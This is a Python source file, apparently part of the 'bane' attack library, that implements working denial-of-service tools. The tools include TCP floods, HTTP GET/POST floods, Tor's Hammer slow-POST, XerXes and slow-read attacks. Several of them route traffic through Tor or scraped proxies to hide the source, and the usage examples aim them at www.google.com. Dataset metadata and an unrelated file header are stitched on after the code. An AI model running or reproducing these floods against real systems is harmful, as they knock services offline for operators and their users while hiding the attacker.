                    time.sleep(self.interval)
                except:
                    pass
            self.kill()
        except:
            pass

    def done(self):
        # True once kill()/reset() has stripped the instance attributes.
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        # Null out then delete every attribute; running threads hit an
        # AttributeError on their next access and die via their except blocks.
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        # Stop the attack; returns the packet count (None when already killed).
        if "stop" in dir(self):
            self.stop = True
            a = self.__dict__["counter"]
            self.reset()
            return a
class tcp_flood:
    """Flood a host with TCP packets of random printable data.

    Each worker opens a TCP connection (optionally routed through a local
    Tor SOCKS5 proxy), pushes a random number of random-sized payloads
    through it, then reconnects, until ``duration`` seconds elapse or
    ``kill()`` is called.  ``counter`` counts payloads sent overall.
    """

    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        min_size=10,
        max_size=50,
        threads=256,
        timeout=5,
        round_min=1000,
        round_max=10000,
        interval=0.001,
        duration=60,
        logs=False,
        tor=False,
    ):
        """Start the flood.

        u: target host/IP.
        p: target TCP port (443/8443 get wrapped in TLS).
        threads_daemon: run workers as daemon threads.
        min_size / max_size: payload length bounds per send.
        threads: number of worker threads.
        timeout: socket timeout (not applied when routing through Tor).
        round_min / round_max: bounds on sends per connection.
        interval: pause between sends.
        duration: hard time limit in seconds.
        logs: print live statistics to stdout.
        tor: route traffic through Tor's SOCKS5 proxy at 127.0.0.1:9050.
        """
        self.logs = logs
        self.stop = False
        self.counter = 0
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        self.tor = tor
        self.min_size = min_size
        self.max_size = max_size
        self.interval = interval
        self.round_min = round_min
        self.round_max = round_max
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        """Worker loop: connect, push random payloads, reconnect."""
        try:
            time.sleep(1)  # give time for all threads to be created
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                    if self.tor == False:
                        # bug fix: the timeout used to be *assigned over* the
                        # settimeout method instead of being applied
                        s.settimeout(self.timeout)
                    if self.tor == True:
                        s.setproxy(
                            socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True
                        )  # let the traffic go through tor
                    s.connect((self.target, self.port))  # connect to target
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(
                            s, ssl_version=ssl.PROTOCOL_TLSv1
                        )  # use ssl if needed on specific ports
                    for l in range(
                        random.randint(self.round_min, self.round_max)
                    ):  # send a random number of packets per connection
                        if (
                            int(time.time() - self.start) >= self.duration
                        ):  # this is a safety mechanism so the attack won't run forever
                            break
                        # bug fix: these checks used to read a module-level
                        # "stop" name (normally undefined -> NameError that
                        # silently killed the send loop) instead of self.stop
                        if self.stop == True:
                            break
                        m = ""
                        for li in range(
                            random.randint(self.min_size, self.max_size)
                        ):  # payload size chosen randomly within bounds
                            m += random.choice(lis)
                        try:
                            if self.stop == True:
                                break
                            s.send(m.encode("utf-8"))
                            self.counter += 1
                            if self.logs == True:
                                sys.stdout.write(
                                    "\rPackets: {} | Bytes: {} ".format(
                                        self.counter, len(m)
                                    )
                                )
                                sys.stdout.flush()
                            time.sleep(self.interval)
                        except:
                            break
                    time.sleep(self.interval)
                    s.close()
                except:
                    pass
                time.sleep(0.1)
            self.kill()
        except:
            pass

    def done(self):
        """Return True once the attack has been torn down by kill()."""
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        """Null out then delete every attribute; running threads die on their
        next attribute access via their except blocks."""
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        """Stop the attack and return the packet count (None if already stopped)."""
        if "stop" not in dir(self):
            return None  # already killed
        self.stop = True
        a = self.counter
        self.reset()
        return a
"""
usage:

>>>bane.tcp_flood('www.google.com')
>>>bane.tcp_flood('www.google.com',p=80, threads=150, timeout=5)

p: (default: 80) targeted port
threads: (default: 256) number of threads to use
timeout: (default: 5) connection timeout in seconds
"""
class http_spam:
    """HTTP GET/POST request flood (HULK-style) against a web server.

    Each worker opens a connection (optionally through Tor), then fires a
    random number of randomized requests built by setup_http_packet()
    before reconnecting.  ``counter`` counts requests sent overall.
    """

    def __init__(
        self,
        u,
        p=80,
        cookie=None,
        user_agents=None,
        method=3,
        threads_daemon=True,
        paths=["/"],
        threads=256,
        post_min=5,
        post_max=10,
        post_field_max=100,
        post_field_min=50,
        timeout=5,
        round_min=1000,
        round_max=10000,
        interval=0.001,
        duration=60,
        logs=False,
        tor=False,
    ):
        """Start the flood.

        u: target host/IP; p: target port (443/8443 get a TLS wrap).
        cookie: optional Cookie header value.
        user_agents: User-Agent pool (falls back to the module-level
          ``ua`` list from bane.payloads when empty).
        method: 1=GET only, 2=POST only, 3=pick randomly per request.
        paths: candidate request paths.
        post_min/post_max, post_field_min/post_field_max: POST value and
          field-name length bounds, forwarded to setup_http_packet().
        timeout: socket timeout (not applied when routing through Tor).
        round_min / round_max: bounds on requests per connection.
        interval: pause between requests; duration: hard time limit.
        logs: print live statistics; tor: route via 127.0.0.1:9050.
        """
        self.logs = logs
        self.cookie = cookie
        self.user_agents = user_agents
        if not self.user_agents or len(self.user_agents) == 0:
            self.user_agents = ua
        self.method = method
        self.stop = False
        self.counter = 0
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        self.tor = tor
        self.interval = interval
        self.round_min = round_min
        self.round_max = round_max
        self.paths = paths
        self.post_min = post_min
        self.post_max = post_max
        self.post_field_max = post_field_max
        self.post_field_min = post_field_min
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        """Worker loop: connect, send randomized requests, reconnect."""
        try:
            time.sleep(1)  # give time for all threads to be created
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                    if self.tor == False:
                        # bug fix: the timeout used to be *assigned over* the
                        # settimeout method instead of being applied
                        s.settimeout(self.timeout)
                    if self.tor == True:
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
                    s.connect((self.target, self.port))
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    for l in range(random.randint(self.round_min, self.round_max)):
                        if self.method == 3:
                            ty = random.randint(1, 2)  # mix GET and POST
                        else:
                            ty = self.method
                        if ty == 1:
                            req = "GET"
                        else:
                            req = "POST"
                        m = setup_http_packet(
                            self.target,
                            ty,
                            self.paths,
                            self.post_field_min,
                            self.post_field_max,
                            self.post_min,
                            self.post_max,
                            self.cookie,
                            self.user_agents,
                        )
                        try:
                            if self.stop == True:
                                break
                            s.send(m.encode("utf-8"))
                            self.counter += 1
                            if self.logs == True:
                                sys.stdout.write(
                                    "\rRequest: {} | Type: {} | Bytes: {} ".format(
                                        self.counter, req, len(m)
                                    )
                                )
                                sys.stdout.flush()
                            time.sleep(self.interval)
                        except:
                            break
                    time.sleep(self.interval)
                    s.close()
                except:
                    pass
                time.sleep(0.1)
            self.kill()
        except:
            pass

    def done(self):
        """Return True once the attack has been torn down by kill()."""
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        """Null out then delete every attribute; running threads die on their
        next attribute access via their except blocks."""
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        """Stop the attack and return the request count (None if already stopped)."""
        if "stop" not in dir(self):
            return None  # already killed
        self.stop = True
        a = self.counter
        self.reset()
        return a
class prox_http_spam:
    """HTTP GET/POST flood pushed through HTTP/SOCKS4/SOCKS5 proxies.

    Works like http_spam, but every connection goes through a proxy
    picked at random from the supplied (or auto-scraped) lists, so the
    requests appear to originate from many different sources.
    """

    def __init__(
        self,
        u,
        p=80,
        cookie=None,
        user_agents=None,
        method=3,
        threads_daemon=True,
        scraping_timeout=15,
        http_list=None,
        socks4_list=None,
        socks5_list=None,
        paths=["/"],
        threads=256,
        post_min=5,
        post_max=10,
        post_field_max=100,
        post_field_min=50,
        timeout=5,
        round_min=1000,
        round_max=10000,
        interval=0.001,
        duration=60,
        logs=False,
    ):
        """Start the flood.

        method: 1=GET only, 2=POST only, 3=pick randomly per request.
        http_list / socks4_list / socks5_list: proxy lists of "ip:port"
          strings.  Pass [] to disable a proxy type, or None to
          auto-scrape one (masshttp/massocks4/massocks5) with
          ``scraping_timeout``.
        The remaining parameters mirror http_spam.
        """
        self.logs = logs
        self.cookie = cookie
        self.user_agents = user_agents
        if not self.user_agents or len(self.user_agents) == 0:
            self.user_agents = ua
        self.method = method
        self.stop = False
        self.counter = 0
        self.httplist = http_list
        if not self.httplist and self.httplist != []:
            self.httplist = masshttp(timeout=scraping_timeout)
        self.socks4list = socks4_list
        if not self.socks4list and self.socks4list != []:
            self.socks4list = massocks4(timeout=scraping_timeout)
        self.socks5list = socks5_list
        if not self.socks5list and self.socks5list != []:
            self.socks5list = massocks5(timeout=scraping_timeout)
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        # bug fix: this used to read an undefined name "tor" (NameError in
        # the constructor); proxies replace Tor here, so the flag is
        # always False and kept only for interface parity
        self.tor = False
        self.interval = interval
        self.round_min = round_min
        self.round_max = round_max
        self.paths = paths
        self.post_min = post_min
        self.post_max = post_max
        self.post_field_max = post_field_max
        self.post_field_min = post_field_min
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        """Worker loop: pick a random proxy, connect through it, spam requests."""
        try:
            time.sleep(1)  # give time for all threads to be created
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    # choose a proxy type at random among the non-empty lists
                    bot_type = []
                    if len(self.httplist) > 0:
                        bot_type.append("h")
                    if len(self.socks4list) > 0:
                        bot_type.append("s4")
                    if len(self.socks5list) > 0:
                        bot_type.append("s5")
                    z = random.choice(bot_type)
                    if z == "h":
                        line = random.choice(self.httplist)
                    elif z == "s4":
                        line = random.choice(self.socks4list)
                    elif z == "s5":
                        line = random.choice(self.socks5list)
                    ipp = line.split(":")[0].split("=")[0]
                    pp = line.split(":")[1].split("=")[0]
                    s = socks.socksocket()
                    if z == "h":
                        s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
                    elif z == "s4":
                        s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
                    elif z == "s5":
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
                    if z == "h":
                        s.settimeout(self.timeout)
                    s.connect((self.target, self.port))
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    for l in range(random.randint(self.round_min, self.round_max)):
                        if self.method == 3:
                            ty = random.randint(1, 2)  # mix GET and POST
                        else:
                            ty = self.method
                        if ty == 1:
                            req = "GET"
                        else:
                            req = "POST"
                        m = setup_http_packet(
                            self.target,
                            ty,
                            self.paths,
                            self.post_field_min,
                            self.post_field_max,
                            self.post_min,
                            self.post_max,
                            self.cookie,
                            self.user_agents,
                        )
                        try:
                            # bug fix: this used to read a module-level
                            # "stop" name (normally undefined) instead of
                            # self.stop
                            if self.stop == True:
                                break
                            s.send(m.encode("utf-8"))
                            self.counter += 1
                            if self.logs == True:
                                sys.stdout.write(
                                    "\rBot: {} | Request: {} | Type: {} | Bytes: {} ".format(
                                        ipp, self.counter, req, len(m)
                                    )
                                )
                                sys.stdout.flush()
                            time.sleep(self.interval)
                        except:
                            break
                    time.sleep(self.interval)
                    s.close()
                except:
                    pass
                time.sleep(0.1)
            self.kill()
        except:
            pass

    def done(self):
        """Return True once the attack has been torn down by kill()."""
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        """Null out then delete every attribute; running threads die on their
        next attribute access via their except blocks."""
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        """Stop the attack and return the request count (None if already stopped)."""
        if "stop" not in dir(self):
            return None  # already killed
        self.stop = True
        a = self.counter
        self.reset()
        return a
class torshammer:
    """Slow-POST ("Tor's Hammer") attack: trickle a huge POST body byte by byte.

    Each worker opens a connection (optionally through Tor), announces a
    large Content-Length, then drips one random character every 0.1-3
    seconds, tying up a server worker for as long as possible.
    ``counter`` tracks currently open connections (incremented on
    connect, decremented when the connection ends).
    """

    def __init__(
        self,
        u,
        p=80,
        cookie=None,
        user_agents=None,
        threads_daemon=True,
        threads=500,
        timeout=5,
        tor=False,
        duration=60,
        logs=False,
        max_content=15000,
        min_content=10000,
    ):
        # u: target host/IP; p: target port (443/8443 get a TLS wrap).
        # cookie: optional Cookie header value.
        # user_agents: User-Agent pool (falls back to the module-level
        #   `ua` list from bane.payloads when empty).
        # threads: number of worker threads.
        # timeout: socket timeout (skipped when tor=True).
        # tor: route through Tor's SOCKS5 proxy at 127.0.0.1:9050.
        # duration: hard time limit in seconds.
        # min_content / max_content: bounds for the advertised Content-Length.
        self.counter = 0
        self.cookie = cookie
        self.user_agents = user_agents
        if not self.user_agents or len(self.user_agents) == 0:
            self.user_agents = ua
        self.max_content = max_content
        self.min_content = min_content
        self.stop = False
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        self.tor = tor
        self.logs = logs
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        # Worker loop: connect, announce a big POST, drip it one byte at a time.
        try:
            time.sleep(1)  # give time for all threads to be created
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                    if self.tor == False:
                        s.settimeout(self.timeout)
                    if self.tor == True:
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
                    s.connect((self.target, self.port))
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    self.counter += 1
                    if self.logs == True:
                        sys.stdout.write(
                            "\rConnected to {}:{}...".format(self.target, self.port)
                        )
                        sys.stdout.flush()
                    # print("Connected to {}:{}...".format(self.target,self.port))
                    # q is both the advertised Content-Length and the number
                    # of body bytes we will slowly drip
                    q = random.randint(self.min_content, self.max_content)
                    ck = ""
                    if self.cookie:
                        ck = "Cookie: " + self.cookie + "\r\n"
                    s.send(
                        reorder_headers_randomly(
                            "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
                                random.choice(paths),
                                ck,
                                random.choice(self.user_agents),
                                random.randint(300, 1000),
                                q,
                                (
                                    random.choice(referers)
                                    + random.choice(lis)
                                    + str(random.randint(0, 100000000))
                                    + random.choice(lis)
                                ),
                                self.target,
                            )
                        ).encode("utf-8")
                    )
                    # drip the body: one random character per send, with a
                    # random 0.1-3s pause, to hold the connection open
                    for i in range(q):
                        if (
                            int(time.time() - self.start) >= self.duration
                        ):  # this is a safety mechanism so the attack won't run forever
                            break
                        if self.stop == True:
                            break
                        h = random.choice(lis)
                        try:
                            s.send(h.encode("utf-8"))
                            if self.logs == True:
                                sys.stdout.write("\rPosted: {}".format(h))
                                sys.stdout.flush()
                            # print("Posted: {}".format(h))
                            time.sleep(random.uniform(0.1, 3))
                        except:
                            break
                    s.close()
                except:
                    pass
                self.counter -= 1
                time.sleep(0.1)
                if self.stop == True:
                    break
            self.kill()
        except:
            pass

    def done(self):
        # True once kill()/reset() has stripped the instance attributes.
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        # Null out then delete every attribute; running threads hit an
        # AttributeError on their next access and die via their except blocks.
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        # Stop the attack; returns the connection count (None when already killed).
        if "stop" in dir(self):
            self.stop = True
            a = self.__dict__["counter"]
            self.reset()
            return a
class prox_hammer:
def __init__(
self,
u,
p=80,
cookie=None,
user_agents=None,
threads_daemon=True,
scraping_timeout=15,
max_content=15000,
min_content=10000,
threads=700,
timeout=5,
http_list=None,
socks4_list=None,
socks5_list=None,
duration=60,
logs=True,
):
self.cookie = cookie
self.user_agents = user_agents
if not self.user_agents or len(self.user_agents) == 0:
self.user_agents = ua
self.httplist = http_list
if not self.httplist and self.httplist != []:
self.httplist = masshttp(timeout=scraping_timeout)
self.socks4list = socks4_list
if not self.socks4list and self.socks4list != []:
self.socks4list = massocks4(timeout=scraping_timeout)
self.socks5list = socks5_list
if not self.socks5list and self.socks5list != []:
self.socks5list = massocks5(timeout=scraping_timeout)
self.stop = False
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.max_content = max_content
self.min_content = min_content
self.logs = logs
self.counter = 0
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
bot_type = []
if len(self.httplist) > 0:
bot_type.append("h")
if len(self.socks4list) > 0:
bot_type.append("s4")
if len(self.socks5list) > 0:
bot_type.append("s5")
z = random.choice(bot_type)
if z == "h":
line = random.choice(self.httplist)
elif z == "s4":
line = random.choice(self.socks4list)
elif z == "s5":
line = random.choice(self.socks5list)
ipp = line.split(":")[0].split("=")[0]
pp = line.split(":")[1].split("=")[0]
s = socks.socksocket()
if z == "h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z == "s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z == "s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z == "h":
s.settimeout(self.timeout)
s.connect((self.target, self.port))
self.counter += 1
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
q = random.randint(self.min_content, self.max_content)
ck = ""
if self.cookie:
ck = "Cookie: " + cookie + "\r\n"
s.send(
reorder_headers_randomly(
"POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
random.choice(paths),
ck,
random.choice(self.user_agents),
random.randint(300, 1000),
q,
(
random.choice(referers)
+ random.choice(lis)
+ str(random.randint(0, 100000000))
+ random.choice(lis)
),
self.target,
)
).encode("utf-8")
)
for i in range(q):
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
h = random.choice(lis)
try:
s.send(h.encode("utf-8"))
if self.logs == True:
sys.stdout.write("\rPosted: {} --> {}".format(h, ipp))
sys.stdout.flush()
# print("Posted: {} --> {}".format(h,ipp))
time.sleep(random.uniform(0.1, 3))
except:
break
s.close()
except:
pass
self.counter -= 1
time.sleep(0.1)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class xerxes:
def __init__(
self,
u,
p=80,
threads_daemon=True,
threads=500,
timeout=5,
duration=60,
logs=False,
tor=False,
):
self.counter = 0
self.target = u
self.port = p
self.stop = False
self.duration = duration
self.timeout = timeout
self.tor = tor
self.start = time.time()
self.logs = logs
self.id_key = 0
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
self.id_key += 1
except:
pass
def attack(self):
try:
x = self.id_key
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout(self.timeout)
if self.tor == True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
s.connect((self.target, self.port))
self.counter += 1
"""if self.logs==True:
#print("[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.write("\r[Connected to {}:{}]".format(self.target,self.port))
sys.stdout.flush()"""
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s.send("\x00".encode("utf-8")) # send NULL character
if self.logs == True:
sys.stdout.write("\r[{}: Voly sent] ".format(x))
sys.stdout.flush()
except:
break
time.sleep(0.2)
except:
pass
self.counter -= 1
time.sleep(0.3)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class prox_xerxes:
def __init__(
self,
u,
scraping_timeout=15,
p=80,
threads_daemon=True,
threads=700,
timeout=5,
http_list=None,
socks4_list=None,
socks5_list=None,
duration=60,
logs=False,
):
self.httplist = http_list
if not self.httplist and self.httplist != []:
self.httplist = masshttp(timeout=scraping_timeout)
self.socks4list = socks4_list
if not self.socks4list and self.socks4list != []:
self.socks4list = massocks4(timeout=scraping_timeout)
self.socks5list = socks5_list
if not self.socks5list and self.socks5list != []:
self.socks5list = massocks5(timeout=scraping_timeout)
self.stop = False
self.counter = 0
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.logs = logs
self.id_key = 0
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
self.id_key += 1
except:
pass
def attack(self):
try:
x = self.id_key
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
bot_type = []
if len(self.httplist) > 0:
bot_type.append("h")
if len(self.socks4list) > 0:
bot_type.append("s4")
if len(self.socks5list) > 0:
bot_type.append("s5")
z = random.choice(bot_type)
if z == "h":
line = random.choice(self.httplist)
elif z == "s4":
line = random.choice(self.socks4list)
elif z == "s5":
line = random.choice(self.socks5list)
ipp = line.split(":")[0].split("=")[0]
pp = line.split(":")[1].split("=")[0]
s = socks.socksocket()
if z == "h":
s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
elif z == "s4":
s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
elif z == "s5":
s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
if z == "h":
s.settimeout(self.timeout)
s.connect((self.target, self.port))
self.counter += 1
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s.send("\x00".encode("utf-8")) # send NULL character
if self.logs == True:
sys.stdout.write(
"\r[{}: Voly sent-->{}] ".format(x, ipp)
)
sys.stdout.flush()
except:
break
time.sleep(0.2)
except:
pass
self.counter -= 1
time.sleep(0.3)
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
"""
this tool is to perform slow reading attack. i read about this type of attacks on: https://blog.qualys.com/tag/slow-http-attack and tried to do the same thing in python (but in a better way though :p ). on this attack, the attacker is sending a full legitimate HTTP request but reading it slowly to keep the connection open as long as possible. here im doing it a bit different of the original attack with slowhttptest, im sending a normal HTTP request on each thread then read a small part of it (between 1 to 3 bytes randomly sized) then it sleeps for few seconds (3 to 5 seconds randomly sized too), then it sends another request and keep doing the same and keeping the connection open forever.
it takes the following parameters:
u: target ip or domain
p: (set by default to: 80)
threads: (set by default to: 500) number of connections
timeout: (set by default to: 5) connection timeout flag
example:
>>>import bane
>>>bane.slow_read_attack('www.google.com',p=443,threads=300,timeout=7)
"""
class slow_read:
def __init__(
self,
u,
p=80,
cookie=None,
user_agents=None,
paths=["/"],
threads_daemon=True,
threads=500,
timeout=5,
min_speed=3,
max_speed=5,
max_read=3,
min_read=1,
logs=False,
tor=False,
duration=60,
):
self.counter = 0
self.cookie = cookie
self.user_agents = user_agents
if not self.user_agents or len(self.user_agents) == 0:
self.user_agents = ua
self.stop = False
self.target = u
self.port = p
self.paths = paths
self.timeout = timeout
self.tor = tor
self.read_max = max_read
self.read_min = min_read
self.min_speed = min_speed
self.max_speed = max_speed
self.logs = logs
self.duration = duration
self.start = time.time()
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout(self.timeout)
if self.tor == True:
s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
s.connect((self.target, self.port))
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s.send(
setup_http_packet(
self.target,
3,
self.paths,
2,
8,
10,
50,
self.cookie,
self.user_agents,
).encode("utf-8")
)
self.counter += 1
while True:
d = s.recv(random.randint(self.read_min, self.read_max))
if self.logs == True:
sys.stdout.write(
"\rReceived: {} ".format(
str(d.decode("utf-8").strip())
)
)
sys.stdout.flush()
# print("Received: {}".format(str(d.decode('utf-8'))))
time.sleep(random.randint(self.min_speed, self.max_speed))
except:
break
s.close()
except:
pass
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
"""
The rest of the DDoS tools have been removed and will be added slowly in the coming versions :) Be patient !!
"""
| 34.110587 | 700 | 0.430297 | 5,178 | 50,586 | 4.105446 | 0.088837 | 0.014959 | 0.009032 | 0.010725 | 0.801581 | 0.784222 | 0.756609 | 0.742544 | 0.732854 | 0.714319 | 0 | 0.024462 | 0.473095 | 50,586 | 1,482 | 701 | 34.133603 | 0.773092 | 0.04521 | 0 | 0.846726 | 0 | 0.002976 | 0.036642 | 0.013727 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040923 | false | 0.023065 | 0.011161 | 0 | 0.08631 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1fef0391d1f2e1d4e570a65fa73396a69a54b023 | 162 | py | Python | cancontroller/controller/nodes/__init__.py | lucasdietrich/caniot-pycontroller | c8ec4a9831dc294086ff194bc09a8d9c23758848 | [
"MIT"
] | null | null | null | cancontroller/controller/nodes/__init__.py | lucasdietrich/caniot-pycontroller | c8ec4a9831dc294086ff194bc09a8d9c23758848 | [
"MIT"
] | null | null | null | cancontroller/controller/nodes/__init__.py | lucasdietrich/caniot-pycontroller | c8ec4a9831dc294086ff194bc09a8d9c23758848 | [
"MIT"
] | null | null | null | from cancontroller.controller.nodes.alarm_controller import AlarmController
from cancontroller.controller.nodes.garage_door_controller import GarageDoorController | 81 | 86 | 0.919753 | 17 | 162 | 8.588235 | 0.588235 | 0.232877 | 0.369863 | 0.438356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 162 | 2 | 86 | 81 | 0.941935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
1f6ad75991f462e6e967a6b1bfba5f36e69b5fe5 | 86 | py | Python | while_stmt.py | duduscript/pl0-compiler-ply- | 75a70fae38ab0fd5393f69518a2736b4365173ab | [
"MIT"
